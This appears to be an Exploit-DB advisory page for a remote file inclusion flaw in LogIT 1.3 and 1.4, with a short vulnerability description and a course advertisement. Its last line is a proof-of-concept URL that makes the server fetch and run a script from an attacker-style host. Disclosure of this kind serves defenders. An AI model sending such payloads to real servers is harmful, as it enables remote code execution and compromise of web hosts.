LogIT 1.3/1.4 - Remote File Inclusion

EDB-ID:

27345


Author:

botan

Type:

webapps


Platform:

PHP

Date:

2006-03-02


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

source: https://www.securityfocus.com/bid/16932/info

LogIT is prone to a remote file-include vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input.

Attackers may specify remotely hosted script files to be executed in the context of the webserver hosting the vulnerable software. An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the webserver process. 

LogIT versions 1.3 and 1.4 are affected by this vulnerability; other versions may also be affected.

http://www.example.com/?pg=http://www.example2.com/evilcode